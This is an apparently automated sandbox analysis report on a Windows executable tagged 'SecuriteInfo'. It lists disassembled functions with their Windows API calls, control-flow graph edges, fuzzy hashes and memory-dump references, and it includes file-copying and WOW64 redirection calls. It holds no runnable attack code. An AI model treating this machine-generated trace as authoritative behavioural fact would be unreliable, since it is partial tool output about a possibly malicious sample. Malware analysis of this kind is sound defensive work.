                                                                                                                                                                          • Part of subcall function 00CEE3F0: InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,?,?,?,?,00CF5F2A,?,?), ref: 00CEE44A
                                                                                                                                                                          • Part of subcall function 00CEE3F0: GetDlgItem.USER32(00000000,000003E9), ref: 00CEE45C
                                                                                                                                                                          • Part of subcall function 00CEE3F0: GetWindowRect.USER32(00000000,?), ref: 00CEE472
                                                                                                                                                                          • Part of subcall function 00CEE3F0: SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000206,?,?,?,?,?,?,?,00CF5F2A), ref: 00CEE4B5
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Window$Item$RectText$ActiveCurrentErrorInvalidateLastShowThread
• String ID:
• API String ID: 127311041-0
• Opcode ID: 91bbc267c127fcc2e969e53159ffaacd3c401931776805e4c1656967e6e08675
• Instruction ID: 8976f649ca0e03318669b9928999cf45dab6f1476bf5465a37684aa028f261fb
• Opcode Fuzzy Hash: 91bbc267c127fcc2e969e53159ffaacd3c401931776805e4c1656967e6e08675
• Instruction Fuzzy Hash: 7C61C531500604EFDB21DF69CD48B59BBB4FF04320F14825AFA65AB2E1DB71A948CF92
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph (graph image; legend: Executed / Not Executed)
APIs
• RtlDecodePointer.NTDLL(?,00000000,?,00D7FB44,00E97D7C,?,00000000,?,00CF5F5C,?,00000000,00000000,?,?), ref: 00D7F7B7
• LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,00000000,?,00D7FB44,00E97D7C,?,00000000,?,00CF5F5C,?,00000000,00000000), ref: 00D7F7CC
• DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D7F848
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: DecodePointer$LibraryLoad
• String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
• API String ID: 1423960858-1745123996
• Opcode ID: 8a6b69309915b2b96bcee8ca720aa69ec1abcb52af3902862f4766a6bfeb9c48
• Instruction ID: 8cff2e4cbe58c06ee3c056396f3436cefaf8731fae788cc559d4db6eb1b40b7a
• Opcode Fuzzy Hash: 8a6b69309915b2b96bcee8ca720aa69ec1abcb52af3902862f4766a6bfeb9c48
• Instruction Fuzzy Hash: 33019BB15543016BDB255B109D43FD937948F02748F085074BC8D772E3F661954DC1BB
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph (graph image; legend: Executed / Not Executed)
APIs
• GetModuleHandleW.KERNEL32(Advapi32.dll,00000000,1FC3D414), ref: 00CCA404
• GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 00CCA414
• RegCloseKey.ADVAPI32(00000000), ref: 00CCA45D
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: AddressCloseHandleModuleProc
• String ID: <;$Advapi32.dll$RegOpenKeyTransactedW
• API String ID: 4190037839-135955970
• Opcode ID: 7f7d7f35b93b49f5154b15147cd329219da47278c978345a3b5c5c7a098e27a6
• Instruction ID: 8d5befc278da1962642fbfec360ca9ee7a72989fc3b96c122233eaf120bb2cab
• Opcode Fuzzy Hash: 7f7d7f35b93b49f5154b15147cd329219da47278c978345a3b5c5c7a098e27a6
• Instruction Fuzzy Hash: 35A16AB0D00308DFDB14DFA8C859BAEBBF4BF48304F14865DE415AB291DB74AA44CBA1
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph (graph image; legend: Executed / Not Executed)
APIs
• PathIsUNCW.SHLWAPI(?,1FC3D414,?,?,?), ref: 00CCCF5B
• CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00E23B3C,00000001,?,?,?,?,?,00DA842D,000000FF,?,8000000B), ref: 00CCD01A
• GetLastError.KERNEL32(?,?,?,?,00DA842D,000000FF,?,8000000B), ref: 00CCD028
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: CreateDirectoryErrorLastPath
• String ID: <3
• API String ID: 953296794-878583566
• Opcode ID: 5e9f284875d6b6d7045d79d23f0442079c0768306ecb95ec648d5efcfe6d9676
• Instruction ID: 50000e55d8dcb30e6c79b98944a55ede5c086e3eed1a1c46a3e163173385671a
• Opcode Fuzzy Hash: 5e9f284875d6b6d7045d79d23f0442079c0768306ecb95ec648d5efcfe6d9676
• Instruction Fuzzy Hash: 5581B231A006099FDB10DFA8C885F9DFBF4EF05320F14426AE925A72D0DB759A49CB50
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph (graph image; legend: Executed / Not Executed)
APIs
• CreateThread.KERNEL32 ref: 00CF618D
• GetLastError.KERNEL32 ref: 00CF619A
• WaitForSingleObject.KERNEL32(00000000,FFFFFFFF), ref: 00CF61C3
• GetExitCodeThread.KERNEL32(00000000,?), ref: 00CF61DD
• TerminateThread.KERNEL32(00000000,00000000), ref: 00CF61F5
• CloseHandle.KERNEL32(00000000), ref: 00CF61FE
Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                         • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Thread$CloseCodeCreateErrorExitHandleLastObjectSingleTerminateWait
                                                                                                                                                                        • String ID: <s
                                                                                                                                                                        • API String ID: 1566822279-2940880691
                                                                                                                                                                        • Opcode ID: 748dc2367d6292bd1d0ee4f497083e7c9ed967caf3de7999972904a409c39ab0
                                                                                                                                                                        • Instruction ID: a04c6cded75f8569c5a7c54e10f5a6bf1c2721dbfd551df253ab05b63ce4fa62
                                                                                                                                                                        • Opcode Fuzzy Hash: 748dc2367d6292bd1d0ee4f497083e7c9ed967caf3de7999972904a409c39ab0
                                                                                                                                                                        • Instruction Fuzzy Hash: C1310870900209AFDF10CF95CD18BEEBBB4FB08714F104229E960B62D0DB799A48CFA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                         control_flow_graph 2400 d11610-d11646 2401 d11676-d116ac CreateThread 2400->2401 2402 d11648-d1165b CreateEventW 2400->2402 2405 d116b2-d116c4 2401->2405 2406 d1178c-d117b7 WaitForSingleObject GetExitCodeThread 2401->2406 2403 d11669-d11671 2402->2403 2404 d1165d-d11666 2402->2404 2403->2401 2404->2403 2407 d11701-d1170a 2405->2407 2408 d116c6-d116cc 2405->2408 2409 d117c7-d117da 2406->2409 2410 d117b9-d117c0 CloseHandle 2406->2410 2411 d1170d-d1172a 2407->2411 2413 d116d0-d116d2 2408->2413 2410->2409 2414 d11770-d11786 call d7fa13 2411->2414 2415 d1172c 2411->2415 2416 d116d8-d116da 2413->2416 2417 d117dd-d11825 call bba850 2413->2417 2430 d11789 2414->2430 2419 d11730-d11732 2415->2419 2416->2417 2420 d116e0-d116fd 2416->2420 2427 d11835-d11855 call bbab90 2417->2427 2428 d11827-d1182c 2417->2428 2419->2417 2422 d11738-d1173a 2419->2422 2420->2413 2424 d116ff 2420->2424 2422->2417 2426 d11740-d11747 2422->2426 2424->2411 2426->2417 2429 d1174d-d11753 2426->2429 2434 d1193b-d1195d call bba850 2427->2434 2435 d1185b-d1186f 2427->2435 2428->2427 2429->2417 2432 d11759-d1176e 2429->2432 2430->2406 2432->2414 2432->2419 2443 d11968-d11974 2434->2443 2444 d1195f-d11962 WaitForSingleObject 2434->2444 2440 d118a1 2435->2440 2441 d11871-d11877 2435->2441 2442 d118a3-d118a8 call bba6d0 2440->2442 2445 d11887-d1188c 2441->2445 2446 d11879-d11885 call bba140 2441->2446 2455 d118ad-d118db call cccf10 2442->2455 2449 d11976-d11978 2443->2449 2450 d1199c-d119a6 2443->2450 2444->2443 2447 d11890-d11899 2445->2447 2446->2455 2447->2447 2452 d1189b-d1189f 2447->2452 2456 d119eb-d11a0d call bba850 call d11a20 2449->2456 2457 d1197a-d11980 2449->2457 2453 d119a8-d119aa 2450->2453 2454 d119cb-d119d1 2450->2454 2452->2442 2453->2456 2460 d119ac-d119b2 2453->2460 2470 d118e5-d118f3 call d67900 2455->2470 2471 d118dd-d118e0 2455->2471 2477 d11a1a-d11a1d 2456->2477 2478 d11a0f-d11a17 call d7fe78 2456->2478 2457->2456 2462 d11982-d1198c call cf1370 2457->2462 2460->2456 2465 d119b4-d119c4 call d117f0 2460->2465 2467 d11991-d11995 2462->2467 2472 d119d4-d119db 2465->2472 2479 d119c6-d119c9 2465->2479 2467->2472 2473 d11997-d1199a 2467->2473 2483 d118f5-d118f8 2470->2483 2484 d1191b 2470->2484 2471->2470 2472->2454 2480 d119dd-d119e8 2472->2480 2473->2449 2473->2450 2478->2477 2479->2453 2479->2454 2488 d11914-d11919 2483->2488 2489 d118fa-d11912 call d105c0 2483->2489 2485 d11920 call d105c0 2484->2485 2493 d11925-d11938 2485->2493 2488->2485 2489->2493
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,1FC3D414,00000000,?,?,?,?,?,?,?,00000000,00DF574D,000000FF), ref: 00D11650
                                                                                                                                                                        • CreateThread.KERNEL32 ref: 00D11686
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00D1178F
                                                                                                                                                                        • GetExitCodeThread.KERNEL32(00000000,?), ref: 00D1179A
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00D117BA
                                                                                                                                                                          • Part of subcall function 00BBA850: HeapAlloc.KERNEL32(?,00000000,?,1FC3D414,00000000,00DA7F70,000000FF,?,?,00E8EFDC,?,00D119F5,8000000B), ref: 00BBA89A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                         • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateThread$AllocCloseCodeEventExitHandleHeapObjectSingleWait
                                                                                                                                                                        • String ID: <3
                                                                                                                                                                        • API String ID: 3988410809-878583566
                                                                                                                                                                        • Opcode ID: 106ffe673ffc59baea54eb482f0a20ef22d1308331a78d867597643896b812d8
                                                                                                                                                                        • Instruction ID: ae6c8a8a74b5f60369242809af6cc836cfbd25314a6bbe277a9f4fa644f37a00
                                                                                                                                                                        • Opcode Fuzzy Hash: 106ffe673ffc59baea54eb482f0a20ef22d1308331a78d867597643896b812d8
                                                                                                                                                                        • Instruction Fuzzy Hash: 0CB19279A00605EFDB14CF69D884BAAB7F4FF49310F144259E916AB791DB30E944CFA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 2496 cb4b90-cb4bec call cb4a80 call bbab90 2501 cb4cdd-cb4d54 call bba850 FreeLibrary EnterCriticalSection 2496->2501 2502 cb4bf2 2496->2502 2506 cb4d9e-cb4dbf LeaveCriticalSection 2501->2506 2507 cb4d56-cb4d5a 2501->2507 2504 cb4bf5-cb4c25 call bb9bb0 call ccc960 2502->2504 2540 cb4c5a-cb4c6a 2504->2540 2541 cb4c27-cb4c3e 2504->2541 2509 cb4dff-cb4e07 2506->2509 2510 cb4dc1-cb4dc5 2506->2510 2511 cb4d6c-cb4d6e 2507->2511 2512 cb4d5c-cb4d66 DestroyWindow 2507->2512 2516 cb4e09-cb4e0c 2509->2516 2517 cb4e33-cb4e41 2509->2517 2518 cb4dc7-cb4dd0 call d89d16 2510->2518 2519 cb4dd6-cb4ddb 2510->2519 2511->2506 2515 cb4d70-cb4d74 2511->2515 2512->2511 2521 cb4d76-cb4d7f call d89d16 2515->2521 2522 cb4d85-cb4d9b call d7fe78 2515->2522 2516->2517 2523 cb4e0e 2516->2523 2525 cb4e5d-cb4e71 call cb70e0 2517->2525 2526 cb4e43-cb4e47 2517->2526 2518->2519 2527 cb4ded-cb4dfc call d7fe78 2519->2527 2528 cb4ddd-cb4de6 call d89d16 2519->2528 2521->2522 2522->2506 2534 cb4e10-cb4e15 2523->2534 2551 cb4e79-cb4e8a 2525->2551 2552 cb4e73 2525->2552 2536 cb4e49-cb4e50 2526->2536 2537 cb4e56-cb4e5b 2526->2537 2527->2509 2528->2527 2546 cb4e1d-cb4e31 2534->2546 2547 cb4e17-cb4e19 2534->2547 2536->2537 2537->2525 2537->2526 2553 cb4c6c-cb4c70 2540->2553 2554 cb4cb0-cb4cbf 2540->2554 2549 cb4c48-cb4c52 call bbab90 2541->2549 2550 cb4c40-cb4c43 2541->2550 2546->2517 2546->2534 2547->2546 2549->2501 2565 cb4c58 2549->2565 2550->2549 2552->2551 2558 cb4ca2-cb4ca8 call bba6d0 2553->2558 2559 cb4c72-cb4c76 2553->2559 2556 cb4cc9-cb4cdc 2554->2556 2557 cb4cc1-cb4cc4 2554->2557 2557->2556 2564 cb4cad 2558->2564 2559->2558 2563 cb4c78-cb4c8e call bba380 2559->2563 2568 cb4c9b-cb4ca0 2563->2568 2569 cb4c90-cb4c98 2563->2569 2564->2554 2565->2504 2568->2564 2569->2568
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00CB4B90: GetModuleFileNameW.KERNEL32(00000000,?,00000104,1FC3D414,00000000,?,00DE3F86,000000FF), ref: 00CB4AD8
                                                                                                                                                                          • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000001,1FC3D414,?,00000001,?,?,?), ref: 00CB4D27
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00E9946C), ref: 00CB4D42
                                                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 00CB4D60
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00E9946C), ref: 00CB4DA9
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                         • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalInit_thread_footerSection$DestroyEnterFileFreeHeapLeaveLibraryModuleNameProcessWindow
                                                                                                                                                                        • String ID: %s%lu$.local
                                                                                                                                                                        • API String ID: 3496055493-548699545
                                                                                                                                                                        • Opcode ID: 039914ef24603ec18370e9f9bccb53cb12991ff54d32670d69a3168940f89df5
                                                                                                                                                                        • Instruction ID: 287354ff57636f05e5cca635198b6c789bd4a58f109cebad614929a650f9700b
                                                                                                                                                                        • Opcode Fuzzy Hash: 039914ef24603ec18370e9f9bccb53cb12991ff54d32670d69a3168940f89df5
                                                                                                                                                                        • Instruction Fuzzy Hash: CF91FD71A052009FDB24DF69C844BAEFBF4FF04710F14856EE865AB392DB749904CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 2571 d100a0-d100eb call ccf280 2574 d100f7-d10105 2571->2574 2575 d100ed-d100f2 2571->2575 2577 d10110-d10131 2574->2577 2576 d102a1-d102cb call d80528 2575->2576 2579 d10133-d10139 2577->2579 2580 d1013b-d10152 SetFilePointer 2577->2580 2579->2580 2582 d10162-d10177 ReadFile 2580->2582 2583 d10154-d1015c GetLastError 2580->2583 2584 d1029c 2582->2584 2585 d1017d-d10184 2582->2585 2583->2582 2583->2584 2584->2576 2585->2584 2586 d1018a-d1019b 2585->2586 2586->2577 2587 d101a1-d101ad 2586->2587 2588 d101b0-d101b4 2587->2588 2589 d101c1-d101c5 2588->2589 2590 d101b6-d101bf 2588->2590 2591 d101c7-d101cd 2589->2591 2592 d101e8-d101ea 2589->2592 2590->2588 2590->2589 2591->2592 2594 d101cf-d101d2 2591->2594 2593 d101ed-d101ef 2592->2593 2595 d101f1-d101f4 2593->2595 2596 d10204-d10206 2593->2596 2597 d101e4-d101e6 2594->2597 2598 d101d4-d101da 2594->2598 2595->2587 2600 d101f6-d101ff 2595->2600 2601 d10216-d1023c SetFilePointer 2596->2601 2602 d10208-d10211 2596->2602 2597->2593 2598->2592 2599 d101dc-d101e2 2598->2599 2599->2592 2599->2597 2600->2577 2601->2584 2603 d1023e-d10253 ReadFile 2601->2603 2602->2577 2603->2584 2604 d10255-d10259 2603->2604 2604->2584 2605 d1025b-d10265 2604->2605 2606 d10267-d1026d 2605->2606 2607 d1027f-d10284 2605->2607 2606->2607 2608 d1026f-d10277 2606->2608 2607->2576 2608->2607 2609 d10279-d1027d 2608->2609 2609->2607 2610 d10286-d1029a 2609->2610 2610->2576
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetFilePointer.KERNEL32(00DF52BD,-00000400,?,00000002,00000400,1FC3D414,?,?,?), ref: 00D10146
                                                                                                                                                                        • GetLastError.KERNEL32(?,?), ref: 00D10154
                                                                                                                                                                        • ReadFile.KERNEL32(00DF52BD,00000000,00000400,?,00000000,?,?), ref: 00D1016F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                         • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$ErrorLastPointerRead
                                                                                                                                                                        • String ID: ADVINSTSFX
                                                                                                                                                                        • API String ID: 64821003-4038163286
                                                                                                                                                                        • Opcode ID: b52f27caf1ccbc293b8e66b9e853fb5512ef91b7293e0584dbfcace23e689b0e
                                                                                                                                                                        • Instruction ID: 6801383ba1edb2786bad7320962f0f54de8fad2fded25a9898319c2a985952a9
                                                                                                                                                                        • Opcode Fuzzy Hash: b52f27caf1ccbc293b8e66b9e853fb5512ef91b7293e0584dbfcace23e689b0e
                                                                                                                                                                        • Instruction Fuzzy Hash: 2361B271A00209AFDB01DFA8D884BEEBBB5FF55314F284265E505E7280DBB49DC5CB64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 2611 cd6b40-cd6b80 call cd1c70 2614 cd6d7b-cd6d83 call cd6e10 2611->2614 2615 cd6b86-cd6ba2 SHGetFolderPathW 2611->2615 2624 cd6d87-cd6da4 call d7fe6a 2614->2624 2616 cd6bae-cd6bbd 2615->2616 2617 cd6ba4-cd6bac 2615->2617 2619 cd6bbf 2616->2619 2620 cd6bd2-cd6be3 call cb1fc0 2616->2620 2617->2616 2617->2617 2622 cd6bc0-cd6bc8 2619->2622 2629 cd6be5 2620->2629 2630 cd6c07-cd6c49 call bc0ec0 call d821f0 call cbeab0 2620->2630 2622->2622 2625 cd6bca-cd6bcc 2622->2625 2625->2614 2625->2620 2631 cd6bf0-cd6bfc 2629->2631 2639 cd6c4d-cd6c75 GetTempFileNameW call bb8810 2630->2639 2640 cd6c4b 2630->2640 2631->2614 2634 cd6c02-cd6c05 2631->2634 2634->2630 2634->2631 2643 cd6c77-cd6c7d call d80528 2639->2643 2644 cd6c80-cd6c8f 2639->2644 2640->2639 2643->2644 2646 cd6c9b-cd6cc5 call d8052d 2644->2646 2647 cd6c91-cd6c99 2644->2647 2651 cd6cc7-cd6cd0 2646->2651 2652 cd6ce3-cd6d30 Wow64DisableWow64FsRedirection CopyFileW 2646->2652 2647->2646 2647->2647 2653 cd6cd2-cd6ce1 2651->2653 2654 cd6d3a-cd6d45 2652->2654 2655 cd6d32-cd6d35 call cd6e10 2652->2655 2653->2652 2653->2653 2657 cd6d67-cd6d79 call bb8810 2654->2657 2658 cd6d47-cd6d61 Wow64RevertWow64FsRedirection 2654->2658 2655->2654 2657->2624 2658->2657
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00CD1C70: __Init_thread_footer.LIBCMT ref: 00CD1D42
                                                                                                                                                                        • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,1FC3D414,00000000,00000000,?), ref: 00CD6B95
                                                                                                                                                                        • GetTempFileNameW.KERNEL32(00000000,shim_clone,00000000,?), ref: 00CD6C5C
                                                                                                                                                                        • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00CD6CFF
                                                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00CD6D21
                                                                                                                                                                        • Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 00CD6D4D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Wow64$FileRedirection$CopyDisableFolderInit_thread_footerNamePathRevertTemp
                                                                                                                                                                        • String ID: shim_clone
                                                                                                                                                                        • API String ID: 1326775856-3944563459
                                                                                                                                                                        • Opcode ID: 653c4094afb4da9f62a663cc1feede0c4f9abc04328041c538edf4a20f625cca
                                                                                                                                                                        • Instruction ID: aae1239bccad07a15e20893fac8eb4b1752d1f9c2ea49708d1ce9de1f0565071
                                                                                                                                                                        • Opcode Fuzzy Hash: 653c4094afb4da9f62a663cc1feede0c4f9abc04328041c538edf4a20f625cca
                                                                                                                                                                        • Instruction Fuzzy Hash: 6A61E770A002589FDF24DB24CC45BA9B7F5EF54300F5440EAE646A7291DF749F89CB64
                                                                                                                                                                        Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph: function at 00BC8DA1 (graph rendering not reproduced)

APIs
• CallWindowProcW.USER32(?,?,?,?,00000024), ref: 00BC8E40
• GetWindowLongW.USER32(?,000000FC), ref: 00BC8E55
• CallWindowProcW.USER32(?,?,00000082,?,00000024), ref: 00BC8E6B
• GetWindowLongW.USER32(?,000000FC), ref: 00BC8E85
• SetWindowLongW.USER32(?,000000FC,?), ref: 00BC8E95
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
